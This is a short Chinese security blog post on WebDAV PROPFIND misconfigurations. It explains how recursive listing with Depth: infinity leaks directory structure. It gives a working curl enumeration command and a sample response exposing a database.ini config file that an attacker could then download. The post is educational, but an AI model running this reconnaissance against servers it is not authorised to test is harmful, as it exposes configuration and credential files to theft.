SRC 小漏洞
SRC 小漏洞
Khan安全团队
发布于 2025-04-04 07:41:16
发布于 2025-04-04 07:41:16
代码可运行
运行总次数:0
代码可运行
PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置。
PROPFIND 漏洞的原理
漏洞通常由以下原因引发:
- 不安全的配置服务器未正确限制
PROPFIND方法的访问权限。 - 目录遍历漏洞攻击者可能通过
PROPFIND请求访问本应受限的目录或文件(例如通过Depth: infinity参数递归遍历目录)。 - 信息泄露服务器可能通过
PROPFIND响应返回敏感信息(如内部文件路径、系统配置等)。 - 拒绝服务(DoS)攻击者可能发送大量复杂的
PROPFIND请求,导致服务器资源耗尽。
漏洞的影响
- 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。
- 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。
- 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。
- 服务中断通过 DoS 攻击使服务器无法响应正常请求。
示例
curl -X PROPFIND http://example.com/webdav/ -H "Depth: infinity" -H "Content-Type: text/xml" --data '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'Depth: infinity表示递归遍历所有子目录。<D:allprop/>请求返回所有文件属性。
如果服务器配置不当,可能返回类似以下信息:
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/webdav/</D:href>
<D:propstat>
<D:prop>
<D:displayname>webdav</D:displayname>
<D:getlastmodified>Fri, 01 Jan 2023 00:00:00 GMT</D:getlastmodified>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webdav/config/</D:href>
<D:propstat>
<D:prop>
<D:displayname>config</D:displayname>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webdav/config/database.ini</D:href>
<D:propstat>
<D:prop>
<D:displayname>database.ini</D:displayname>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
- 攻击者通过响应发现了
/webdav/config/database.ini文件路径。攻击者可以直接下载该文件。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-04-03,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
推荐阅读
相关推荐
使用C#WebClient类访问(上传/下载/删除/列出文件目录)由IIS搭建的http文件服务器
更多 >
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
腾讯云开发者
